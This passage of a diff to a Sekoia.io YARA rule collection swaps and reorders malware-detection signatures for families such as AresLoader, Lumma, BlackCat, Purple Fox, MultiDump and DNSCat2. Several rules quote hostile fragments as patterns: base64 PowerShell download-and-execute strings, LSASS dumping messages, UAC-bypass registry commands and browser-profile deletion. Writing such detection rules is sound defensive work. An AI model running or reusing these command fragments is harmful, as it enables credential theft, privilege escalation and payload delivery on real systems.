+		hash.md5( pe.rich_signature.clear_data ) == "d16713cbfe04151b3a9e832c8afd55df" or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "3f638774c2565594029fb52ceb67db7a" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "f9416bfb43b2c70837927e43e7591a2a" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "6eede2cebaef39eec5bd1c24c809e3dc" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "1177658fb0469cd5982102c9f3cd2eea" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "658d877d1bf0d2928b2c3efec9ec06cf" ) or pe.imphash ( ) == "d6b6f8cdffb06f469e06c7af9639897c"
 }
-rule SEKOIA_Apt_Sandworm_Powergap_Apr2022 : FILE
+rule SEKOIA_Loader_Win_Aresloader : FILE
 {
 	meta:
-		description = "Detects the POWERGAP malware"
+		description = "Finds AresLoader samples based on characteristic strings"
 		author = "Sekoia.io"
-		id = "2a1c7f02-92b3-45b8-a710-253b1a28fe85"
-		date = "2022-04-12"
+		id = "bf5070fc-c8ca-4458-8702-cd1830667b7a"
+		date = "2023-05-02"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_sandworm_powergap_apr2022.yar#L1-L20"
+		reference = "https://blog.cyble.com/2023/04/28/citrix-users-at-risk-aresloader-spreading-through-disguised-gitlab-repo/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/loader_win_aresloader.yar#L1-L28"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "f1532cce42ab1315d3ab7882fa43ad05255055da720a123bed034242d439da2a"
+		logic_hash = "2edbb625394506e865580373d5c3454b4fa201183c84d247b4373f24e25f5fd4"
 		score = 75
-		quality = 68
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Get-WmiObject Win32 ComputerSystem).Domain" nocase wide ascii
-		$ = "Write-Host \"Error1" nocase wide ascii
-		$ = "Write-Host \"Done\" -ForegroundColor Red" nocase wide ascii
-		$ = "sysvol\\$Domain\\Poicies\\$GpoGuid" nocase wide ascii
-		$ = "Function Start-work" nocase wide ascii
-		$ = "Domain: {0}\" -f $Domain)" nocase wide ascii
+		$str01 = "{\\\"ip\\\": '%s', \\\"UID\\\": '%s', \\\"geo\\\": '%s', \\\"service\\\": '%s', \\\"owner_token\\\": '%s'}" ascii
+		$str02 = "AresLdr_v_3" ascii
+		$str03 = "https://ipinfo.io/ip" ascii
+		$str04 = "C:\\Users\\%s\\AppData\\Roaming\\%s\\%s" ascii
+		$str05 = "/manager/payload" ascii
+		$str06 = "/manager/loader" ascii
+		$str07 = "/manager/legit" ascii
+		$str08 = "/manager/hvnc" ascii
+		$str09 = "C%p %d V=%0X w=%ld %s" ascii
+		$str10 = "rundll32.exe %s,%s" ascii
+		$str11 = "%startinfo" ascii
+		$str12 = "%managedapp" ascii
+		$str13 = "%has_cctor" ascii
 
 	condition:
-		filesize < 3KB and 5 of them
+		uint16( 0 ) == 0x5A4D and 5 of them
 }
-rule SEKOIA_Rootkit_Win_Purplefox_Svchost_Txt : FILE
+rule SEKOIA_Tool_Multidump_Strings : FILE
 {
 	meta:
-		description = "Detects Purple Fox payloads used during end-2021 and 2022 campaigns based on characteristics shared by TrendMicro details."
+		description = "Detects MultiDump"
 		author = "Sekoia.io"
-		id = "e992d574-6a44-4bea-97e2-6d5579ce8d02"
-		date = "2022-03-28"
+		id = "4897c898-01dd-40d2-bf28-266231c88f8a"
+		date = "2024-03-19"
 		modified = "2024-12-19"
-		reference = "https://www.trendmicro.com/en_us/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal.html"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/rootkit_win_purplefox_svchost_txt.yar#L1-L22"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_multidump_strings.yar#L1-L22"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "a1de949cb2e898ed031f5c796f7152af12dfae5431dfaf269f25ebe72f0ae004"
+		logic_hash = "8d98cf89d56f5a949023364f94c8d55f8875408b082fb52e118f99d46533124d"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -239855,126 +239721,113 @@ rule SEKOIA_Rootkit_Win_Purplefox_Svchost_Txt : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str0 = "C:\\ProgramData\\dll.dll,luohua" wide
-		$str1 = "C:\\ProgramData\\7z.exe" wide
-		$str2 = "F:\\hidden-master\\x64\\Debug\\QAssist.pdb" ascii
-		$str3 = "F:\\Root\\sources\\MedaiUpdateV8\\Release\\MedaiUpdateV8.pdb" ascii
-		$str4 = "cmd.exe /c RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 255" ascii
-		$str5 = "del /s /f %appdata%\\Mozilla\\Firefox\\Profiles\\*.db" ascii
+		$ = "--nodump\tDisable LSASS dumping"
+		$ = "-r 192.168.1.100:5000"
+		$ = "Path to save procdump.exe"
+		$ = "[!] CreateFileW [R] Failed With Error"
+		$ = "LSASS is Running, Continuin"
+		$ = "Dumping LSASS Using ProcDump"
 
 	condition:
-		4 of ( $str* ) and filesize > 7000KB and filesize < 9500KB
+		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 3 of them
 }
-rule SEKOIA_Apt_Apt28_Ukrnet_Phishing_Page : FILE
+rule SEKOIA_Loader_Win_Piccassoloader : CVE_2023_38831
 {
 	meta:
-		description = "Detects APT28 Phishing page"
+		description = "Detect the variant of Picasso used by GhostWriter as CVE-2023-38831 exploitation payload"
 		author = "Sekoia.io"
-		id = "053158d8-aac0-486f-8432-834a06f41ed2"
-		date = "2024-09-02"
+		id = "91d9c2de-451e-467e-8f5c-38bbcce92b72"
+		date = "2023-09-07"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_apt28_ukrnet_phishing_page.yar#L1-L24"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/loader_win_piccassoloader.yar#L1-L16"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "20dc3a5beb8e3a7801e010b4113efef1"
-		hash = "5f1462144d7704101cd71c679ea0322b"
-		logic_hash = "3d077a7ce35094bcbda763c131d4564ffbcea0373f5cbd30406ada4e9db36529"
+		logic_hash = "93e598f6c70dcb1ddf20ea926af72241e135bdf910f3721a7a0c3036f6a3d1b9"
 		score = 75
-		quality = 80
-		tags = "FILE"
+		quality = 76
+		tags = "CVE-2023-38831"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "baseurl+\"/captcha\""
-		$ = "(\"sessionID\", sessionID"
-		$ = ".responseJSON['origin"
-		$ = "var baseurl="
-		$ = "(req.responseText.includes("
-		$ = "else if (req.responseText=='FAIL')"
-		$ = "|| document.getElementById('confpwd"
-		$ = "/master/dist/text-security-disc.woff"
+		$ = {2c 27 44 65 63 72 79 70 74 6f 72 27 2c 27 6e 6f 64 65 27 2c 27 55 73 65 72 2d}
+		$ = {5c 78 32 30 43 68 72 6f 6d 65 2f 31 30 27 2c 27 67 67 65 72 27 2c 27 73 65 64 43 69 70 68 65 72 27 2c 27 5f 61 70 70 65 6e 64 27 2c 27 5f 45 4e 43 5f 58 46 4f 52 4d 27 2c 27 57 53 63 72 69 70 74 2e 53 68 27}
 
 	condition:
-		4 of them and filesize < 500KB
+		1 of them
 }
-rule SEKOIA_Apt_Andariel_Siennablue : FILE
+rule SEKOIA_Apt_Sandworm_Powergap_Apr2022 : FILE
 {
 	meta:
-		description = "Detects SiennaBlue based routine names"
+		description = "Detects the POWERGAP malware"
 		author = "Sekoia.io"
-		id = "ab3f8b49-0851-47a8-ac77-98d4e26f448e"
-		date = "2023-11-16"
+		id = "2a1c7f02-92b3-45b8-a710-253b1a28fe85"
+		date = "2022-04-12"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_andariel_siennablue.yar#L1-L20"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_sandworm_powergap_apr2022.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "0876deb2e76098ac8d304737243d3a76e9741b2ca1570034bec51fea5a40818d"
+		logic_hash = "f1532cce42ab1315d3ab7882fa43ad05255055da720a123bed034242d439da2a"
 		score = 75
-		quality = 80
+		quality = 68
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "main_cryptAVPass"
-		$ = "main_DecryptString"
-		$ = "main_DisableNetworkDevice"
-		$ = "main_DeleteSchTask"
+		$ = "Get-WmiObject Win32 ComputerSystem).Domain" nocase wide ascii
+		$ = "Write-Host \"Error1" nocase wide ascii
+		$ = "Write-Host \"Done\" -ForegroundColor Red" nocase wide ascii
+		$ = "sysvol\\$Domain\\Poicies\\$GpoGuid" nocase wide ascii
+		$ = "Function Start-work" nocase wide ascii
+		$ = "Domain: {0}\" -f $Domain)" nocase wide ascii
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize > 4MB and filesize < 15MB and all of them
+		filesize < 3KB and 5 of them
 }
-rule SEKOIA_Ransomware_Win_Blackcat : FILE
+
+rule SEKOIA_Rat_Win_Nighthawk : FILE
 {
 	meta:
-		description = "Detect the BlackCat ransomware (Windows version)"
+		description = "Detects Nighthawk RAT"
 		author = "Sekoia.io"
-		id = "873355f7-3942-4171-9df7-f524bb6b6903"
-		date = "2022-01-19"
+		id = "91bc3c5b-83fd-47f8-9652-df0f6a70b693"
+		date = "2022-11-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/ransomware_win_blackcat.yar#L1-L31"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/rat_win_nighthawk.yar#L3-L25"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "8a60fd14835f9e8683c3e60a19f23bc00020ccd22e74bffbc8ed19fcb8d0e39a"
+		logic_hash = "9a0c72de5b097f74d3c44586b8355c410470992f37d9a09c5f6db36ad6286d70"
 		score = 75
 		quality = 80
 		tags = "FILE"
+		version = "1.0"
+		hash1 = "0551ca07f05c2a8278229c1dc651a2b1273a39914857231b075733753cb2b988"
+		hash2 = "9a57919cc5c194e28acd62719487c563a8f0ef1205b65adbe535386e34e418b8"
+		hash3 = "38881b87826f184cc91559555a3456ecf00128e01986a9df36a72d60fb179ccf"
+		hash4 = "f3bba2bfd4ed48b5426e36eba3b7613973226983a784d24d7a20fcf9df0de74e"
+		hash5 = "b775a8f7629966592cc7727e2081924a7d7cf83edd7447aa60627a2b67d87c94"
 		classification = "TLP:CLEAR"
-		version = "1.1"
 
 	strings:
-		$s1 = "desktop_image::set_desktop_wallpaper=" ascii
-		$s2 = "C:\\Users\\Public\\All Usersdeploy_note_and_image_for_all_users=" ascii
-		$s3 = "propagate::none" ascii
-		$s4 = "propagate::failed=" ascii
-		$s5 = "propagate::ok=" ascii
-		$s6 = "query_status_process::ok=" ascii
-		$s7 = "enum_dependent_services::ok=" ascii
-		$s8 = "enum_dependent_services::error=" ascii
-		$s9 = "try_stop=" ascii
-		$s10 = "try_stop::ok=" ascii
-		$s11 = "try_stop::failed=" ascii
-		$s12 = "stop=" ascii
-		$s13 = "dependent_service_name=" ascii
-		$s14 = "kill_all=" ascii
-		$s15 = "detach=" ascii
+		$pattern1 = { 48 8d 0d ?? ?? ?? ?? 51 5a 48 81 c1 ?? ?? ?? ?? 48 81 c2 ?? ?? ?? ?? ff e2 }
+		$pattern2 = { 66 03 D2 66 33 D1 66 C1 E2 02 66 33 D1 66 23 D0 0F B7 C1 }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 2MB and filesize < 4MB and all of them
+		uint16( 0 ) == 0x5A4D and filesize < 2MB and ( ( 1 of them ) or ( pe.section_index ( ".profile" ) and pe.section_index ( ".detourc" ) ) )
 }
-rule SEKOIA_Apt_Lazarus_Blindingcan_Rtti
+rule SEKOIA_Apt_Reaper_2Fa_Phishing_Webpage
 {
 	meta:
-		description = "Detects BLINDINGCAN with RTTI"
+		description = "Detects Reaper 2FA phishing webpage"
 		author = "Sekoia.io"
-		id = "9a16c189-ffc1-4aa6-8582-298abaecd0ef"
-		date = "2022-10-04"
+		id = "348ca2ad-c8f9-4aed-8a27-95caa3a34f4b"
+		date = "2023-03-09"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_lazarus_blindingcan_rtti.yar#L1-L16"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_reaper_2fa_phishing_webpage.yar#L1-L23"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "fbec1f9a180782bf330d86facbada9af018741897c58f4ab6e0b52a1b38ae966"
+		logic_hash = "3f0ae0b35ea181b4712feeb34e866519921917179297148982e5298df9f133a9"
 		score = 75
 		quality = 80
 		tags = ""
@@ -239982,58 +239835,62 @@ rule SEKOIA_Apt_Lazarus_Blindingcan_Rtti
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = ".?AVCHTTP_Protocol@@" ascii wide fullword
-		$s2 = ".?AVCFileRW@@" ascii wide fullword
+		$ = "setTimeout(checkUpload,"
+		$ = "commChannel.addListener("
+		$ = "else if(commType =="
+		$ = "?dir=DOWN&method=READ&id="
+		$ = "Content : base64_encode(upload_data)"
+		$ = "$.post(upHttpRelayer"
+		$ = "var ablyUpData = {"
+		$ = "initComm();"
+		$ = "function Next(arg) {"
 
 	condition:
-		all of them
+		3 of them
 }
-rule SEKOIA_Win_Malware_Statc_Downloader : FILE
+rule SEKOIA_Infostealer_Win_Lumma_Strings_Sept23 : FILE
 {
 	meta:
-		description = "Statc Downloader powershell script. Base64 powershell"
+		description = "Finds Lumma samples based on the specific strings"
 		author = "Sekoia.io"
-		id = "4a2e9607-635b-4cd8-ba27-d70e0c76fd45"
-		date = "2023-08-09"
+		id = "45900760-c10d-40c0-a49a-c66358a8a66a"
+		date = "2023-09-14"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/win_malware_statc_downloader.yar#L1-L28"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_lumma_strings_sept23.yar#L1-L23"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "173ea5af2e71b6ed70abd52a5d2f4de040393a6d2ff4978bbb6e73d96742b010"
-		logic_hash = "a99970a6ace88234e5e2bda009f8d87e6a0dc8c1a4655cca128e30292a21502c"
+		logic_hash = "099dd81a72f8c9dac38fd0f9ab4e99b60f0e7742d6a64313e2989aa8955c01ec"
 		score = 75
-		quality = 80
+		quality = 55
 		tags = "FILE"
 		version = "1.0"
+		modification_date = "2023-10-31"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$powershell = "powershell.exe"
-		$a1 = "KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAGYAaQBsAGUAKAAiAGgAdAB0AHAAcwA6AC8A"
-		$a2 = "gATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABmAGkAbABlACgAIgBoAHQAdABwAHMAOgAvA"
-		$a3 = "oAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACIAaAB0AHQAcABzADoALw"
-		$b1 = "aQBuAHYAbwBrAGUALQBlAHgAcAByAGUAcwBzAGkAbwBuACAAIgAkAGUAbgB2ADoAVABFAE0AUABc"
-		$b2 = "kAbgB2AG8AawBlAC0AZQB4AHAAcgBlAHMAcwBpAG8AbgAgACIAJABlAG4AdgA6AFQARQBNAFAAX"
-		$b3 = "pAG4AdgBvAGsAZQAtAGUAeABwAHIAZQBzAHMAaQBvAG4AIAAiACQAZQBuAHYAOgBUAEUATQBQAF"
-		$c1 = "MQAgADEAIgA7ACAAIgBPAEsAIgA7"
-		$c2 = "EAIAAxACIAOwAgACIATwBLACIAO"
-		$c3 = "xACAAMQAiADsAIAAiAE8ASwAiAD"
+		$str10 = "CryptStringToBinaryA" ascii
+		$str11 = "WinHttpQueryDataAvailable" ascii
+		$str12 = "GetComputerNameExA" ascii
+		$str13 = "GetCurrentHwProfileW" ascii
+		$str14 = "ntdll.dll" wide
+		$str16 = "minkernel\\crts\\ucrt\\inc\\corecrt_internal_strtox.h" wide
+		$str17 = "xxxxxxxxxxx" ascii
 
 	condition:
-		$powershell at 0 and 1 of ( $a* ) and 1 of ( $b* ) and 1 of ( $c* ) and filesize < 1MB
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule SEKOIA_Apt_Uac0154_Malicious_Html_Smuggling : FILE
+rule SEKOIA_Apt_Oilrig_Powerexchange : FILE
 {
 	meta:
-		description = "UAC-0154 Infection chain"
+		description = "Detects OilRig's PowerExchange backdoor"
 		author = "Sekoia.io"
-		id = "923d11e5-6332-456d-8aff-ae7fb76193a8"
-		date = "2023-10-02"
+		id = "cb6b370f-7b05-480b-865e-ac81ded4a2a4"
+		date = "2023-10-24"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_uac0154_malicious_html_smuggling.yar#L1-L17"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_oilrig_powerexchange.yar#L1-L19"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "ba37b076ac29edcb9af7792420b527b0d64e7838e0237b39afe98a817eafdf7e"
+		logic_hash = "5e505e9bbb17500f7e9a316b66bccb62089172582478230e0bda736bbefa1fd6"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -240041,26 +239898,27 @@ rule SEKOIA_Apt_Uac0154_Malicious_Html_Smuggling : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Microsoft&reg; HTML Help Workshop 4.1"
-		$ = "var a=['"
-		$ = ")+b('0x"
+		$ = "($h.value).PadRight((($h.value).Length+($h.value).Length%4),'='" ascii wide
+		$ = "(($h.value).Length%4 -ne 0)" ascii wide
+		$ = "-match \"@@(.*)@@\"" ascii wide
+		$ = "[Environment]::NewLine+$_.Exception.Message | Out-File -FilePath" ascii wide
+		$ = "ContainsSubjectStrings.Add(\"@@\")" ascii wide
 
 	condition:
-		all of them and filesize < 100KB
+		2 of them and filesize < 50KB
 }
-rule SEKOIA_Trojan_Win_Bbtok_Dll1_Sep23 : FILE
+rule SEKOIA_Apt_Coathanger_Beacon : FILE
 {
 	meta:
-		description = "Finds BBTok installation DLL file"
+		description = "Detects COATHANGER beacon"
 		author = "Sekoia.io"
-		id = "eebed24b-24ec-4a85-852c-52d0acc9a698"
-		date = "2023-09-26"
+		id = "cc201479-016a-46d2-a9e2-41b4914ce618"
+		date = "2024-02-07"
 		modified = "2024-12-19"
-		reference = "https://research.checkpoint.com/2023/behind-the-scenes-of-bbtok-analyzing-a-bankers-server-side-components/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/trojan_win_bbtok_dll1_sep23.yar#L1-L28"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_coathanger_beacon.yar#L1-L21"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "5353956345206982af9bde55300fc405ba6e40722e8f51e8717c30ad32bc8f91"
-		logic_hash = "1b1e25f7d760d275d2ef01390c215edb1752ad65383c92a21d71d9e65da3c5f8"
+		logic_hash = "e44496e62de8c885d5bd941819a97f4c0dd90ce2d0cfe9d042ab9590cc354ddb"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -240068,33 +239926,28 @@ rule SEKOIA_Trojan_Win_Bbtok_Dll1_Sep23 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "C:\\Windows\\System32\\rundll32.exe" wide
-		$str02 = "C:\\ProgramData\\mmd.exe" wide
-		$str03 = "REG ADD HKCU\\Software\\Classes\\.pwn\\Shell\\Open\\command -ve /d" wide
-		$str04 = "C:\\ProgramData\\mmd.exe \\\\" wide
-		$str05 = "\\file\\Trammy.dll" wide
-		$str06 = "Dacl & REG DELETE HKCU\\Software\\Classes\\ms-settings /f" wide
-		$str07 = "REG DELETE  HKCU\\Software\\Classes\\.pwn /f" wide
-		$str08 = "REG ADD HKCU\\Software\\Classes\\ms-settings\\CurVer -ve /d \".pwn\" /f" wide
-		$str09 = "timeout /t 3 >nul & start /MIN computerdefaults.exe" wide
-		$str10 = "set_StartInfo" ascii
-		$str11 = "set_WindowStyle" ascii
+		$ = {
+        48 B8 47 45 54 20 2F 20 48 54
+        48 89 45 B0 48 B8 54 50 2F 32 0A 48 6F 73
+        48 89 45 B8 48 B8 74 3A 20 77 77 77 2E 67
+        48 89 45 C0 48 B8 6F 6F 67 6C 65 2E 63 6F
+        }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 7 of them and filesize < 50KB
+		uint32( 0 ) == 0x464c457f and filesize < 5MB and any of them
 }
-rule SEKOIA_Backdoor_Powershellempire_Python : FILE
+rule SEKOIA_Rootkit_Win_Purplefox_Svchost_Txt : FILE
 {
 	meta:
-		description = "Detects Empire Python version"
+		description = "Detects Purple Fox payloads used during end-2021 and 2022 campaigns based on characteristics shared by TrendMicro details."
 		author = "Sekoia.io"
-		id = "c2913f60-46a2-42c1-8569-72568eaddaed"
-		date = "2022-04-15"
+		id = "e992d574-6a44-4bea-97e2-6d5579ce8d02"
+		date = "2022-03-28"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backdoor_powershellempire_python.yar#L1-L16"
+		reference = "https://www.trendmicro.com/en_us/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal.html"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/rootkit_win_purplefox_svchost_txt.yar#L1-L22"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "81c74a73ff7fe02420f29a53b350f1b53964f5a04f0694fed5b1b4bd6cc5ad03"
+		logic_hash = "a1de949cb2e898ed031f5c796f7152af12dfae5431dfaf269f25ebe72f0ae004"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -240102,24 +239955,28 @@ rule SEKOIA_Backdoor_Powershellempire_Python : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "import sys,base64;exec"
-		$ = "aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2"
+		$str0 = "C:\\ProgramData\\dll.dll,luohua" wide
+		$str1 = "C:\\ProgramData\\7z.exe" wide
+		$str2 = "F:\\hidden-master\\x64\\Debug\\QAssist.pdb" ascii
+		$str3 = "F:\\Root\\sources\\MedaiUpdateV8\\Release\\MedaiUpdateV8.pdb" ascii
+		$str4 = "cmd.exe /c RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 255" ascii
+		$str5 = "del /s /f %appdata%\\Mozilla\\Firefox\\Profiles\\*.db" ascii
 
 	condition:
-		all of them and filesize < 1MB
+		4 of ( $str* ) and filesize > 7000KB and filesize < 9500KB
 }
-rule SEKOIA_Apt_Luckymouse_Compromised_Electronapp : FILE
+rule SEKOIA_Hacktool_Dnscat2_Strings : FILE
 {
 	meta:
-		description = "Detects compromised ElectronApp"
+		description = "Detects DNSCat2 based on strings"
 		author = "Sekoia.io"
-		id = "7702217d-771f-47af-8eaa-d5acf1e14f4d"
-		date = "2022-08-05"
+		id = "9655cdd7-c7fe-4033-bdd9-bdfcfd2bf827"
+		date = "2022-02-25"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_luckymouse_compromised_electronapp.yar#L1-L15"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/hacktool_dnscat2_strings.yar#L1-L22"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "939546b75d5f7161bb8eb1fd838a9a7c0c88cb58a0f01f67e687523e5b31b0aa"
+		logic_hash = "40d906ca3a00f7d3e2f8d043dbbc77a2a57fd133f4812b863aec6d5a0f57a8c9"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -240127,51 +239984,56 @@ rule SEKOIA_Apt_Luckymouse_Compromised_Electronapp : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s = "module.exports=function(t){eval(function(p,a,c,k,e,r)"
+		$ = "Creating a exec('%s') session!"
+		$ = "RROR parsing --dns"
+		$ = "Got a ping request! Responding!"
+		$ = "[Tunnel %d] Received %zd bytes"
+		$ = "[Tunnel %d] connection to %s:%d"
+		$ = "You'll need to use --dns server=<server>"
+		$ = "Setting delay between packets to %dms"
 
 	condition:
-		$s at 0 and filesize < 100KB
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and 3 of them
 }
-rule SEKOIA_Downloader_Mac_Rustbucket_Swiftloader
+rule SEKOIA_Exploit_Linux_Eop_Cve20177308_Strings : CVE_2017_7308 FILE
 {
 	meta:
-		description = "Detect the file com.EdoneViewer in the new version of RustBucker 2023-10"
+		description = "Detects CVE-2017-7308 exploit"
 		author = "Sekoia.io"
-		id = "bdbc95db-5d58-4c96-91f9-34b653e67f50"
-		date = "2023-12-05"
+		id = "72d225dd-386c-47d5-afb3-c6712c0bdd9a"
+		date = "2023-12-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/downloader_mac_rustbucket_swiftloader.yar#L1-L19"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/exploit_linux_eop_cve20177308_strings.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "acb5b88f8af53cd3d83de0fd6c3049ce017f038dc7c8b31f70e65e60bf713dfb"
+		logic_hash = "c9fd605ced8bb2c3861f642cdc08b99b320ee19658ce60f1b9679a1ccc427bf7"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "CVE-2017-7308, FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "7c5bf60787bfd076c8806eaa4f1185f5b9fda69008376624ab3d17f207eb16a4"
-		hash2 = "bc90adde92bd47b4de7d384e5b20c1a1791d603629bd0fcba4b550fb35e93216"
-		hash3 = "c9a7b42c7b29ca948160f95f017e9e9ae781f3b981ecf6edbac943e52c63ffc8"
 
 	strings:
